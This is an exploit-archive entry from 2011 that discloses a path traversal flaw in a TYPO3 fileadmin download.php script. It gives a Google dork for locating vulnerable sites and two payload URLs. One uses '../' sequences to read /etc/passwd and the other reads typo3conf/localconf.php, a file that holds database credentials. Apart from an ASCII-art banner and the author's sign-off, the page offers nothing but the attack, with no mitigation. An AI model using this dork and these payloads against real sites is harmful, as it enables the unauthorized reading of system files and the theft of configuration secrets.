[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Typo3 File Disclosure
# Published : 2011-09-29
# Author :
# Previous Title : GotoCode Online Bookstore Multiple Vulnerabilities
# Next Title : Vivvo CMS - Local File include
________________________________________________________________________________________
| _ _ |
| ||\ || || || | \ // | ____ ________ __________ |
| || \ || || || | |\ //| | | | ______| |_______/ / |
| || \ || || || | | \ // | | | _ | | / / |
| || \ || || || | | \ // | | | |_) | | |______ /`'__ / / |
| || \ || || || | | \ // | | | _ < | ______| / / / |
| || \ || ||_______|| | | \// | | | |_) | | |______ _ / / |
| || \|| |_________| |_| / |_| |_____/ |________| /_/ /_/ |
|_________________________________________________________________________________________|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [Typo3 File Disclosure]
# Google Dork: [inurl:"/fileadmin/download.php?Fichier_a_telecharger=*"]
# Date: [29/09/2011]
# Author: [Number 7]
# Contact :spam[-]tn[.]cs[@]live[.]fr
# Software Link: [http://typo3.org/]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://127.0.0.1/fileadmin/download.php?Fichier_a_telecharger=../../../../../etc/passwd
http://localhost/path/fileadmin/download.php?Fichier_a_telecharger=../typo3conf/localconf.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Made In Tunisia // Kairouan // Mansoura City :D